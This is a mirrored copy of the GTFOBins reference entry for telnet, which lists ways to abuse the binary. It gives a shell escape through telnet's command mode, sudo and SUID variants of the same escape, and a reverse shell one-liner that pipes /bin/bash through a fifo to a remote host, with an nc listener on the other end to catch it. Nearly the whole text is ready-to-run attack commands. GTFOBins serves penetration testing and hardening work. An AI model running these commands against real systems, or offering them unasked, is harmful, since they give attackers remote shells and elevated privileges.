1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-19 02:11:39 +02:00
GTFOBins.github.io/_gtfobins/telnet.md
2018-05-22 21:22:20 +01:00

776 B

functions
exec-interactive reverse-shell sudo-enabled suid-limited
code description
RHOST=www.google.com RPORT=80 telnet $RHOST $RPORT ^] !/bin/sh MacOS only.
description code
Run `nc -l -p 8000` to receive the shell on the other end. RHOST=10.0.0.1 RPORT=8000 TF=$(mktemp) rm $TF mkfifo $TF && telnet $RHOST $RPORT 0<$TF | /bin/bash 1>$TF
code description
RHOST=www.google.com RPORT=80 sudo telnet $RHOST $RPORT ^] !/bin/sh MacOS only.
code description
RHOST=www.google.com RPORT=80 ./telnet $RHOST $RPORT ^] !/bin/sh MacOS only.